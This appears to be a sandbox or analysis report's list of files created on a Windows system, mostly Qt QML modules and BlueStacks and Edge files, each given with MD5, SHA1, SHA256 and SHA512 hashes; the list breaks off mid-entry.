C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtQuick\Controls\Label.qml
| MD5 | be7923cb8144fdc10b6874b7a2b7df11 |
| SHA1 | 65bbeca10e685720b3cc5483780619f937ef54c8 |
| SHA256 | bf30f222012d7f17729a2346a4887b06149391fc8b51f59298c5da3f198e6e06 |
| SHA512 | 9ea94345a75e8e6d0a34e37bac5d13c58f1bf70f1b28ce225da304ea19bf3f08a7e94d32b15d5d2d3fc9865735947a055e2d542af724c71535e096d454df7f08 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtQuick\Controls\Calendar.qml
| MD5 | 097c9e71db49da7812817d2384058991 |
| SHA1 | 196b3e9c5202828b32d67b872e7d7bae4f9991a6 |
| SHA256 | f0ddd9578c48f3e83be4a77870827cdf0d42588aa1fab51e74e544274c29c9b8 |
| SHA512 | 89cd08a5b64fcb4058b67ed5327f1fff457f3c6b6b585d85cbadc014720b08e0132e449a117925f1a2a560b08ca01cedec3bf4c26739f69a1525346ebe5c980a |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtQuick\Controls\ApplicationWindow.qml
| MD5 | 73e4d19b712b1c33bec069d16bb63557 |
| SHA1 | 95de4d5a51424cfabf80daf118db8210837c6447 |
| SHA256 | 17c95348263dcb8cb37d9af05cc4b9b2e0a96c6cb7d4a881a46fb13a00c6c8b7 |
| SHA512 | 1d7b1087fc452b0ea5974cbc09cf28710d84a2ead7ba31c4aac031c8f15f70e2bafa239bf3a8d167b84eefc90d7e5501d017ee019756f5a3112483c4b77f87d9 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtMultimedia\qmldir
| MD5 | 44e34fa143bfaa33f9dd6ebd13ef0466 |
| SHA1 | df857a43b313c8d531ffc3c7bd33c14625bcd06a |
| SHA256 | be3831209463405a965a7c66a178d4fffd0c2f10de168ebf851cc0965d2c20d3 |
| SHA512 | bb2c2f3c95508bd6326ac3e29a3765fe8c6ed9b88adc54bfad1ea851a957e7575a4e0a254da4b65d30ac82b081e338a9e60b8b62f6a7c7a5073892303beee8de |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtMultimedia\plugins.qmltypes
| MD5 | 41df66ad5f8bed5fbfb6719a4bf6f3ba |
| SHA1 | b3d8a12ac7ac5cd29908f60a06b24c81f617b5b1 |
| SHA256 | 34185224c6f82d8de0656bac43ea855316267b862ee129f134b3ac53a54a0ece |
| SHA512 | 5cc89f3904b6516a10589b7dd1fe512537f6ff31384a4075269c2ce57e872dad3bb3e01290359b95e96ae64517b5ef5146932200ce5d3071b5f808b5e4a9e6ae |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtMultimedia\declarative_multimedia.dll
| MD5 | 7211ef1bb6bfef816a8b691f6673a73c |
| SHA1 | 636885c0f2a563c1ab437b7955ba6a0de211ad1f |
| SHA256 | b591ca349a912626683472516e9e15de00b9d54d51fd6b6cf330ec98f4285e4f |
| SHA512 | c8c3f8ccf7ffc9016763ae9e518f8b40d734ed987581f843785baae4d9d4de29b39c530a10d960aa89f89dbd22a378e51eabc93eebefd97104e6b155c63f73c6 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\ZoomBlur.qml
| MD5 | 8809727c210aabd119cb1c774ae6f909 |
| SHA1 | f3eca66159805c260cf196d66a48eb1dbe15daa1 |
| SHA256 | 50ec0d53e7bcedb1af9b48caecb2df007f10ccd036e690b73e9578dce8ca5241 |
| SHA512 | 6bdabc75241ac1be0dd8185ad8df5b8112863e6257501b8d2b9ce31dc18e741317a462edd489c3cb0a17b1f7636d93ff262d792ecbe39ec205faf5f6183c4863 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\ThresholdMask.qml
| MD5 | b79b1000d0c09d2de6ef258aa3637a91 |
| SHA1 | 72a95d62c4d6140480efe286d5f724fdedd62cf5 |
| SHA256 | 09c372e2b57e0958925405772c270b6bf41f9edcfab7ab6008c78701e2edd035 |
| SHA512 | 0bef363b772275fbb9e6bbe84296af2560eb4268e78380376593c3a90aab02c84669870a46b3df7d8cde3f552b50fcdf56722616a626060bae90645fd54cf23d |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\RecursiveBlur.qml
| MD5 | 37d341ebd7f4044191a330def8d6087b |
| SHA1 | 3b8e65f6fdccb96ac718c9796ecf8b6546244fe2 |
| SHA256 | c9e7a1c397b709fa47f7abd7f8584826a1d73a7e2d5e2b5bfb271734acbef17b |
| SHA512 | 261c3705da28e4fcccabd61a61d7ff62c59264199666bcd6e718503a58dcedb7f2916fe892ebf521c9b0649dc2b6fa83c7986adf77fbc92f3f7c48c2895652d3 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\RectangularGlow.qml
| MD5 | b05dcc8a1c0b16e36880125bdbed639d |
| SHA1 | cc24199d8a201d82a7becb9ec466e738cdeb22a7 |
| SHA256 | 1aff57c6657a72743bd3f9d62aaa2b6ff4e8be36894b5070a08880bd4e414e25 |
| SHA512 | 1542ec910c98afd23d324c1da0866fbe213f5b94b37ef5b864c2ce541497c92bc28734ce637f6c9214a031ec60478db29810ba960aa16883e90a1a52b0d8e358 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\RadialGradient.qml
| MD5 | a6e569f1f55262b95d5cdfe5227228c2 |
| SHA1 | 0febf4507f40e583933c4f5dda215ca319cef20b |
| SHA256 | b70fba05da2dd9595cd475c3b4409745b0f1b94c6c06b21a90995d245bd79ee3 |
| SHA512 | 120a9cba788491faa35a5db442e2df8ecc525ab681ec8ae5979d290f7500b1f35ba07fae0470823b873f99bdbdcea4a7b63cf2e20d332c5f7d16c93a59296bff |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\RadialBlur.qml
| MD5 | b78cf00f13209d60c15dad8ad9fcad7b |
| SHA1 | 32d066e508b44c0011b858467e954c646c7ac123 |
| SHA256 | bca0b0014593e8ba8201b4dcdec26bd540ba53fab0636e6b808eafce7a41a0f8 |
| SHA512 | d52834545d02114eb113bd1c02926fb653cc966b5141f019ec141c749d35184ab2b968273f64e434867887f8ff2a9b5d297189d7e483f19829fa42bcc9d6efb4 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\qtgraphicaleffectsplugin.dll
| MD5 | 41907ae0655574be77fbcc39abed9cb5 |
| SHA1 | 4550f85f9645dd68283ae4feacaa41ba02191b1d |
| SHA256 | 60ebd344f40cab6c49dd92923c3af5d51fce784561e3d1308a3f9617bc6940ff |
| SHA512 | 1df2e6b5ef363df2c7c6cd9c2c5de950954645bfb42fb976bd62723ac3cd9eb54cb4b5061190abd40d46adb2621422e5ed7279a5c55de2a7de3227e0628f246d |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\qmldir
| MD5 | b30fdda9d8391bc35ebfddb4ad45952f |
| SHA1 | e614abd59dcafd491e456cb48695a4c932d05b0c |
| SHA256 | a33ac64a4da419166ea7b498f5b5573b8b0f3d9068c7506c6911f17faeb947f0 |
| SHA512 | 6265e82481cf9627c3fc75458389f61cae3a5fc719662ad673b6c7f4cd52ac3ccc0ac940edba3e8537fa511fc15b69002d17216f351f99bec335c24014396901 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll
| MD5 | 7616224ea139a2685cf099435b753989 |
| SHA1 | 4f37adb583341806e0c0568cd88ea62e9bbd5b0c |
| SHA256 | a5ad526e6c577a53abc9a10aa1eaa6c1496fd7d253b55c9366813ea2d7727dee |
| SHA512 | 09419655da5764beab04ddeeaaf608d21f0f790a023c5ec92da6307d3a0938f7caf09307696ee2a0cfcc894b2871e0c92564e3857e830049106b24c81fb89cc4 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\qmldir
| MD5 | 82be01f1ad655ae2e5068903171bca0a |
| SHA1 | 810adfb9c00a5fa65ac7ff30b0a2ca05f873e058 |
| SHA256 | d7681c4c0c927f07eef863a156e254bde0bfeb48a0eea88f135b80325aa77fdf |
| SHA512 | 97e777fc63a9d851b52a4b9fc2ec1696a3f0beb72dbd91fbbb8ea7f16cbee421d4707dcc11672f6f8aead8098fa3df3b6044607aacd3f573d5a0b22f4cfb611d |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianMaskedBlur.qmlc
| MD5 | 4023291ab80cb36ac61cc849e13cf8bd |
| SHA1 | 1e50150d580fe343ccbd1f305b0f3f15a57be8fc |
| SHA256 | a04d23a705cebc123c5c6c0137fdd1ade6f90b7bec29e3f689bae53444c4778e |
| SHA512 | c35d8d67fa4e2cdf12d8e1907e73a94581a7b51dfae0562366022fc2ef6f0e51a9f00b26198c0d7bcea955c39d23f17b2c9fc3e17d79f9c9ca6e05ff906d38c8 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianMaskedBlur.qml
| MD5 | 491679ad9d744a35843ad99fa7273435 |
| SHA1 | a33fa076be8bfae915ee8249ca3c78fd314e9549 |
| SHA256 | 5c69b8fe2bc4d17eb8f85d2a348c10944668e1021efa1865a9e2548f4fe5836b |
| SHA512 | 55f8eb312bae88e15c5ded044c377275ad68d0c10f82b9119e0d960a3a7f1c58c4bc83e248f54bfce189017ad8535010b00415cd992ae1c60aeb1613e73b8546 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianInnerShadow.qmlc
| MD5 | 82e1216d2e0cee543abcfe176d14d822 |
| SHA1 | 3afd46a6710125c0667c14c82f99ba3a660a6248 |
| SHA256 | 0e520e5730f36c68f0b7a0b39bbef6a5dcfba381f4599475f66add52e02566bb |
| SHA512 | e38065ff49350a4fa6873d1a164702f234132477c6188dad0b60093a7f73d759cefc5b6f8f17ac17b1876154610332e88aee35f94eebe4a074ae417a7146ea70 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianInnerShadow.qml
| MD5 | 804f3062885449c034cab92fe582d8f7 |
| SHA1 | b2f77fdc6b1acd52a7c9d63dbea81919b376862d |
| SHA256 | 21af6e8f474fb487cc40d62b6d5c659a746e924e842f420245775cb972bc3739 |
| SHA512 | bad9dd6923aee85f2f510138f077b892018d353a69676dd05f5880562913c18f70cf93eb3366e98faa044d1bdc92120e774c66b49c103ff1a38aa89a95b1db0f |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianGlow.qmlc
| MD5 | 5ce050469d37f32e642afd3d412edfcf |
| SHA1 | 8e5c339113492efe6a71fb41a66c1fda4993f6fd |
| SHA256 | 8d2b273b7b8eb109cc81ac3ec0631ec5b40fbfd0219a5beb539e5c29dd583ae8 |
| SHA512 | cab22042e729260b10d6c19e06d528ee7cfcb77912942421e075e973c135824689adfffc4776211845366ffe2ed88c056c18796edd7c06e57fb7f63eed5608b3 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianGlow.qml
| MD5 | b54698828093981a262f344e8bf00720 |
| SHA1 | 284f93b68b4d2f781000fc23a224545a10baf882 |
| SHA256 | 0976ef8bc0cd7c9e9ef43ac6e376665ef3fe8975ff27406f534a5238836a6ddc |
| SHA512 | 47a85de1b2038305df633b6dbf0791c6344c74254ef8dfc4c1ecb725d8ffe47954c168c2786255e53292d00bc8bae049a6da010670824688b82c47cb8e32dbc3 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\GaussianDirectionalBlur.qmlc
| MD5 | 3e8c250531599b9a3dbbd9b7db88b90c |
| SHA1 | bd5cf89cca097ff9833c4f5bd5c79154955d9c87 |
| SHA256 | cfab0ed624ad19b5d554093210cf3c74242c6a09d1e3ed7ab76ea1fe0235383a |
| SHA512 | 0f43e3f0cf83d75a37eff4d7a7542bc27d80de3d6cc00bbd0612544b54bb0c802323f2e479cc1ed86a372c0cbef378a0075b8ff1f1547dd801343f358ecb6529 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastMaskedBlur.qmlc
| MD5 | 5765510cacc79d0a6946cf390078b08c |
| SHA1 | 1e24095d8031b0b5a1ad3018eda077e4024b086f |
| SHA256 | c6fa5927784c674b4d56abc4cbd3c34d3f9e51168c0c3f0e27f71226d4379a86 |
| SHA512 | 62825719992ad06d097376d32cea8ff2c357d01bd60ef4a109e0e03b3231b75e5c0f9cb5b53d7402f4ef936dd957c2017491b6ab0e5fedec3761d5c33eb48c89 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastMaskedBlur.qml
| MD5 | b7738f9522c79bcf2c02c6e786e110a6 |
| SHA1 | e2e48ba76267475db3fb0bd0c2099301693dbc94 |
| SHA256 | 6bafd1fbe707892d9a02cad301d2de8b149a6695cabdf994b3b102358aab5f0e |
| SHA512 | 865d60364e39c5511bef74135275aa55127e71d24fb4af5bcf558bff538b9527d54728e34c7ca20f0c7fd826b5b6508ff0111181894cb108ad427f7ce0267bb8 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastInnerShadow.qmlc
| MD5 | 84011dba0ded0a1506e9ce5bf7e7132a |
| SHA1 | 6e3c13a05874a0b928e1ea73352ae92a0c415592 |
| SHA256 | 91034aa0fd7b84a00944085795129d845ec26b7125ac26fff026c186b0d1fb5f |
| SHA512 | 3d13109a7d1d17f6e4fc960025863154e158f293febb5194205c183777e0574d50cf74da2d0b7960a3114c4ebf5d2d080dff014c9de89079c436bbd90ec5cc60 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastInnerShadow.qml
| MD5 | 9fcc8b2b293f8a45ffa13cdec6b873b6 |
| SHA1 | 6f23fa0cce4ef0ccd3f5561dbb77fcd15e0b46d1 |
| SHA256 | 676361ae072fa9dfef37dc9c0d5ec5d5d5c7a55a6b89cc089441bb8d3ebe725a |
| SHA512 | 21767f520f092ecc8c9dc2cc6ede6e703e433a760d65a7b8bc3f8032577731ebaef7a00bbd59d113cb4a0009eb0442df3684e60ba7966aef30963b56414b7d4e |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastGlow.qmlc
| MD5 | d4917acac1191da099c96cc9a5dc83a6 |
| SHA1 | 473a7a03d733529ac77a5ab85743ce7403da381f |
| SHA256 | 998c912fbd9f2d518f117b2831360f22b15e2a658adc0301dc4f07f4d75cff40 |
| SHA512 | 4687ac341142edf7bf6afeaec65e58815e9e292833b13247ca9863699daff28870221e9928e0c1902422eb3158fccff58ea9277f765a26d1120c50003fe006e7 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\FastGlow.qml
| MD5 | ad9b239016c87b2e821863ecb7381d67 |
| SHA1 | 5712040672d6ac820c862903c611b6034190a914 |
| SHA256 | 82d6866cd116d6a13bd447f74b8b1b69203ac20e0f6f82c414b95c2319dbc0bd |
| SHA512 | 4d21eaf9c2dffbbcdc29eb49b84bb80045350ea67c394edf5a122bc32d28a60b6da437369fa8a98d3da226c575650a379100c296f8c92a2b6d2a90234210e0a0 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\DropShadowBase.qmlc
| MD5 | 44cb1c96bd308f14c6e6e3293f97fc05 |
| SHA1 | 891ab31bde6bb5867f1539810c38358e029c98e0 |
| SHA256 | d391b8db0b97b4b3aa8e0122526f51f24c84fe942a51822149c6886ecf482f09 |
| SHA512 | cc4838b433310a7c4be290a03beef910c190de63a970b5afa6ece5139ebc97745b30857a09f16bba1b29765077a9db263cac94ba6878001903bcd6fa0af8ff09 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\private\DropShadowBase.qml
| MD5 | 66f77dae9f921f1e2c1878aee58355ae |
| SHA1 | 33c8c14579cca33a3b53447251e4303d87b2b667 |
| SHA256 | 789f40939fc44ae0fa006d4b47b85630482f501a58ea798538edc56a62d62103 |
| SHA512 | e35e27e77c7e75310d3b43d7c0e920d83686bb4cb4b654c8c790dbe92e61c6d27a38bfc88e1710ced31dd386f6b0ca4f2452be9f87b308521382e5abac9b98ea |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\plugins.qmltypes
| MD5 | c76bd51b4ec5299e2cc9ebdb505ab848 |
| SHA1 | 430083140e4aab9adbf39ad81e2fc820274a82a2 |
| SHA256 | 6350c17d1667563eb1dfba75fe5c4387ccc3f18f8ea1e266648f5df463c1ccf1 |
| SHA512 | 88068751e49c91d6309098bcaa76a6437abf36ea1c14174e250ecf5b0f4a55a85bf42607d7b4cf61393d8b7dad41c2dbad3a4d15d3726667fd572e06f9b5b40f |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\OpacityMask.qml
| MD5 | b374702fc8b9611f4073c1413fb23dbd |
| SHA1 | 51fad11565692b9ad0e1d2b05b5594995aaaf946 |
| SHA256 | efb3d68fb238a76dc3178cf120f29eed78ef5a750a188a7818083ecdc4093a2d |
| SHA512 | 57932c192baff0113dc8883ec73b3cd27fa3851d2731c4740b5f97cce693b7df30180d986cbbd0dce67de873cd066f23049274139e037a4527f9a7bda99d5418 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\MaskedBlur.qml
| MD5 | f2989fa1a4647999fd6b42e7066bcb16 |
| SHA1 | 9533409c713da48c31a7849e4bd7776ed134e9a4 |
| SHA256 | 5768ca07b9c710b53483c56a613dfb175edd3c1b574a69705103667ae0130349 |
| SHA512 | 2ed1072107d65babe6aee082ad8d7d104d9265be750d7e79abf2a574f92772e7b6a2e607f434946c70d121327971a306968f60d0e6cdfa2ca9f97b36cd2bb7f3 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\LinearGradient.qml
| MD5 | 1ea2150858345eee0bd6d2f07a2a2d4c |
| SHA1 | 4d0576aafe4e85c46840fb1f9a4b98f28fd6938e |
| SHA256 | b91050e8bd57c743aa018925eb7c47844eef6219da88835474cfd505d633630e |
| SHA512 | de6a2f492c6920de38ffa3a4812344415d7f1206aa2cb7fe666cab68c039ef3e25457cd58f306c047116d835eb485553ab8bf4e0b5e000894509b3ba9dc77c15 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\LevelAdjust.qml
| MD5 | c06a6e4b80a67628614ada928fbdb565 |
| SHA1 | f27763a6273075adbcae86606d557b19905264fb |
| SHA256 | 3d79efeb518148e6de6b5e61d46e0303ca9a38f2684b9bbf45dc7751d281d6e5 |
| SHA512 | c35c194a5e543d3249d4a907233ea5e7520573e67da500dea7f90e15194f692d649121b5b01d4db70837dbde02fc29ad1144988b7b6a727d83366c145bf56898 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\InnerShadow.qml
| MD5 | a509a66bf6ff6c0b42bab956512ecb5e |
| SHA1 | a276cc164b2df23c29b54e336652e4b022f421bc |
| SHA256 | b32f6e360a5740475d95969cd4e1fa8350e78f707ac3ba24b2a555074fbcf4e5 |
| SHA512 | 53e9f91e328371df9f5ea51c8b3f4dd2014ebbf26d1cfa0167bd50d60449b1107a37b29432fe98e2f027ca8c717f3aaf156244bf3e650ccf18826316b425f1d2 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\HueSaturation.qml
| MD5 | 86f08a39bd6d8ddb8debc4ac928d3747 |
| SHA1 | d76d483a0cecd47cb235c27b0345e31ad63d405a |
| SHA256 | 8a8f90876f612e2aefe1594a15ec2b7e8fac3a66af36ab9bf328efe0f232f5d6 |
| SHA512 | 8fa09fcf8303031271ea940f7a5fb4829918612040f53e3eb6cb1b9aaf96d0f1f47adbe56c3f65e47108ba5df1f005cacde527206a468f49b6dc03981bf65281 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\Glow.qml
| MD5 | f39b620c9a1d84327c7dcf32839d3503 |
| SHA1 | d03b917ed069848860136c5dfb57bf6e38e70485 |
| SHA256 | 9e8c1f27320a3006c315c23ed4546aa4ae3ef63339248f22afe91a627eee6cbb |
| SHA512 | fe7f2f3ae970bd55a51e90c4dd1eddc42812194a2ef98aef48a74b01b10a6ef9901107bc5cbb6f40d9872e141632150b4266e328282b7c03e2de7dcf9a375617 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\GaussianBlur.qml
| MD5 | 16df85757d5147e7af13a943346b1a3e |
| SHA1 | ca067a653d9a817599c29f82bef4f640b2bc87c7 |
| SHA256 | 6df15f72f44b0108a904113cafdda279c25cca6ed29323600ca3e46a573fc89e |
| SHA512 | de7127c4d5e6600144fc9bac79e3cdb86e7bc2e7b0a701ea01012dc363c5d187de6654cf7ed48162af151d9e997aaf27f9a5b1d26a66df2ee92c1a04e69b3a7b |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\FastBlur.qml
| MD5 | 6604726b8e542e4801894cf7eba8d1d0 |
| SHA1 | 7614a3bbf75f1f5aef13df19464a2415fa503880 |
| SHA256 | ff5c14f3c1bdcf2942decb767a6e2a246c3781448503214053a2f16cbde18553 |
| SHA512 | 18e8c1884e8b2660149b698e44bcbd0cd63601bffe6ede3bbc0ea37502cf3948a1562fe28024257c0555385bca9201e039f9ee2330353c72aae81d671df67e28 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\DropShadow.qml
| MD5 | f80ff7be82b6042179b8d3baf6c44e52 |
| SHA1 | af2436799da9913ee1d65dc1ec85eb64e5443123 |
| SHA256 | ab0ad4d055b15ae2c8cfddd17c0067bd44964c8e35d848cf2e484a7ef9d7efdc |
| SHA512 | f03a000e0825ece799c58fe30556abd0cc7ca1a64606e5868010728eaba72f981284e22152dad5dd80b99d3e83548d38b4ef4c77ec23f41fa69776dddf50b6ec |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\DirectionalBlur.qml
| MD5 | 057a23d74c1a2d09f0dbcf026b181831 |
| SHA1 | faa64b8c9355ac266192911aa549905cc245697c |
| SHA256 | 7bf44aeb3654480e2d1c23ca76e53ff5958574766dd95d3cd1f3a1e84510146c |
| SHA512 | 89df4ea201e6b54e80c63072c9e30f4023065f57a451da602978f1cf72740e721edb030bb0790cafe67fb8d958b1ab6c0c1d93a37db3138a1aba9a690540ee7f |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\Desaturate.qml
| MD5 | 58fe5795a1786e903b35d6c31220d8e7 |
| SHA1 | 3d4391ac01510c4e0b3eebba1f2cdae841dfa14d |
| SHA256 | 0f08b5d757f3a1d7db0e7502cccf2cd4975ce8924c091ce8b23e6889ade100e5 |
| SHA512 | 887b9e539f8a397f78b38b4d44ed3ce14a044c23f1943a565d0687bdbdaf57f2d1387fa863a61144807ec7122d9747069bee64f6c626692acf4513e0f31dc5a5 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\ConicalGradient.qml
| MD5 | 54030f53938f983bdfe7a8143f45d059 |
| SHA1 | 74421632f3c1c1d9a3f91664d87da2875a14ca85 |
| SHA256 | 0864cb8e38b25d27966332fa41982ca2e39749b24fe3c173e79877c93fe405c9 |
| SHA512 | 3e698998e4c04956aedb2e337c2b5b3e848b8b344eb8bdde28beb60970b01c1a6136d86aa2c704ade53fd6c38f8a733ba54e7bc91ec13f43d2c2d056ac655610 |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\BrightnessContrast.qml
| MD5 | 6fdc937726d698a82297d6ff6f00c39a |
| SHA1 | bbc4462478f739676579d25a79a1415a42bb88fb |
| SHA256 | 64fba62556110159e3bcb22f2f7106cb38c12b2479fd289c3c51257b8be03824 |
| SHA512 | 76b4248641cd46a053d12082399b1f6e26922b7f3054920bb27c7b6f4bf0906f4178f568a78a8e1ee2f2e5c779edf789ccbcbc2fca44d5506520c5d5927e37da |
C:\Users\Admin\AppData\Local\Temp\7zSC4A7337F\QtGraphicalEffects\Blend.qml
| MD5 | beaec37788f543b4ab3c5c4634c220cc |
| SHA1 | 7b75604471d2d4535bb72401adfd1bd6fa82a317 |
| SHA256 | cc6ef573aee3df53dfcc60df2d438c345da6028f137ab0747c941c13c54cb6c0 |
| SHA512 | 327d9846e1e850d94401d423f9885b1d413651bddb3f6a31891c75a25b34aeb0c40694cd619271f970a0248e7ccbc1d3a47c52f0ac599ccab875af45dbb069b3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bee51384e384b158140aa62bc730bcec |
| SHA1 | 1492578276c1af266d55f5b9415c6f88456b0b48 |
| SHA256 | 432b96f984f6a1aaacbcd078a47969161ba4b12fceced2643ee33589250cbd2e |
| SHA512 | 1d396bf060967d1413e9af292454cf43eca181ad71dee0e6cf53e2cf1b2468d27765f343c9b89a9141d8ff882097419670c3fdf4fce48a78068bde60e660daf8 |
C:\Program Files\BlueStacks_nxt\Assets\installer_bg.png
| MD5 | 08d091faf58df0ea8218d7e08140bbeb |
| SHA1 | 38ebf2763bd2082635a5971c4302021ecaddc0d1 |
| SHA256 | 7e5f6998d34d56aeca87f676c12a42c6c4362ae16a753dc567aae00e253b0817 |
| SHA512 | 5cfede2ea2ade7bbc4b63475af5eb52f78af567fa7096a2ead396056271b8745df4dc6e11e4328151ce59ab74c6c48fd49cd13e30f7f4b86c566757e310fd5e8 |
C:\Program Files\BlueStacks_nxt\BlueStacksHelper.exe.config
| MD5 | 1b456d88546e29f4f007cd0bf1025703 |
| SHA1 | e5c444fcfe5baf2ef71c1813afc3f2c1100cab86 |
| SHA256 | d6d316584b63bb0d670a42f88b8f84e0de0db4275f1a342084dc383ebeb278eb |
| SHA512 | c545e416c841b8786e4589fc9ca2b732b16cdd759813ec03f558332f2436f165ec1ad2fbc65012b5709fa19ff1e8396639c17bfad150cabeb51328a39ea556e6 |
C:\ProgramData\BlueStacks_nxt\Client\Assets\menu_help.png
| MD5 | 2e82bd45c7a8b2e216c27a24d42f12a8 |
| SHA1 | 8ff552358b2d77090a54dad0c12c2757af2ec433 |
| SHA256 | e55ef002466578307998045edd5e10577161efd1cf8f1a71768a8046f4c2ee0d |
| SHA512 | d8f44a110bc31d5834b337553baa599c9a127d7335aeddd7e139ba5c7851db006d36ef74d841f10f7fe69e25edffd89a6faea9d3c72eba27bbbade843af440f7 |
C:\ProgramData\BlueStacks_nxt\Client\Assets\minimize_progress.png
| MD5 | 90d5c0e2977d65b21b430f486114521e |
| SHA1 | cfb48cef2634d4be33210ba54e5b7c5c197530e4 |
| SHA256 | aa538477ded33f33e33cb9a21241dacaceaa0c3e5ad8eb1b6830a448262bc998 |
| SHA512 | 9a3f6690a638a69232335b746a4512ed1c623baa984d87cf4127663c4f85e818a4220564c63b764570e2ade8302989482580af7d9032052335d44b9c98d2d37b |
C:\ProgramData\BlueStacks_nxt\Engine\Manager\BstkGlobal.xml.in
| MD5 | 8c11ed64e4cb4e992c891a1685f5e0bd |
| SHA1 | 1b125f8aa3f77ab5e23bcf18ff7fd9efa5232bc5 |
| SHA256 | 4c64d4ad8897d3198cc69c27e54c9ad24aafd70ee2818a4eb3a970f24b7cd535 |
| SHA512 | c2eee227704f0940bd46db419e42f15ce0dff3b006753c94005ac4c063fe2a2f0f24833a6674e9bbe570adcb425277a78bbbf398d600017e05357f33661d7c7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 3a9f7f77a8f56730a70e92214d82fc6d |
| SHA1 | c6d276c680c9ad8734510d17988369dc43c7ea6d |
| SHA256 | 7e166bf371957c1821c80f4d573adf538c982055dbb5659b7a9c6ba29c055d10 |
| SHA512 | 6fa4c78a0a4b7a8c0f390cbcdbdc40429d20d4a91e2230c19ba58389dc76ddb01a0e12b9b6e58750458214985d98fcd2010751cca83a826fb0f8b0b31ffe8f06 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 83daeb8cc1f5ffb0c095e76e052087cf |
| SHA1 | ede12cc6431add99c31d9293561bc387db0fc810 |
| SHA256 | 61f5a0431bb75dd796ba9050a53096b99e1c01ace45ac1a12b866bad6d1eaab2 |
| SHA512 | 99571f26aea5e63bded1254c6cdf33df3212686d2ad61b878371a9af9d2e38d2cae4a391d4966e8849239049a413477c014477770da2fa1be5e39e95c9c98df9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c31bd715304a9dcd07bd6429422f2c11 |
| SHA1 | da1c0e3e7c712cba9f6483a036a333a9cdae6823 |
| SHA256 | 85d4ddf29c7f4aa36ff9e19a9ea0ce36f55b13fc249c1b894f8c1b3b37991928 |
| SHA512 | b68906f8c4f2df9f08e36655427fc4a7f914056a3c8af5fec056452fc3a34e3feb9b316eafaba6229afcaddf583dec92f9c3b0bd1841057483e9d7906f160e87 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8f32dce2029cd6c0873321305267a505 |
| SHA1 | e21c4cc50562961b1e76a31a74287cb5f56df665 |
| SHA256 | 6d6e7d45df690747e692be6812663e0a45d8e3420bbee5515af74198e9bf2967 |
